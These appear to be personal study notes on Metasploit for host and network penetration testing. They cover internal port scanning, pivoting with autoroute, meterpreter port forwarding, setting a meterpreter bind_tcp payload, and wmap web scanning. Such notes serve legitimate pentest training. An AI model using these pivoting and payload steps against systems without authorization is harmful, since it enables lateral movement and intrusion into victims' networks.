Host & Network pentest (MSF)

Scanning computer of a network's PC with our current access

• scan ports

use auxiliary/scanner/portscan/tcp

ip route

• kinda pivoting

• to scan victim 2 inside different network (we need access to any pc of that network)

run autoroute -s $IP/subnet
# here ip of vitcim-1 would be different (not the IP we pwned the machine with)

background 
#bg the current session

# use the tcp port scan module
set RHOSTS victim-2 #victim 2 address

portforwading

meterpreter>portfwd -l <local_port> -p <remote_port> -r $IP

• note ...... always use /bind/tcp reverse shell module after port forward/pivot

meterpreter> set payload meterpreter/bind_tcp

wmap

• to scan web app with msfconsole

load wmap

#specify sites here
wmap_sites -a $IP

#set target url
wmap_targets -t http://$IP/

#list sites
wmap_sites -l

#to run
wmap_run -t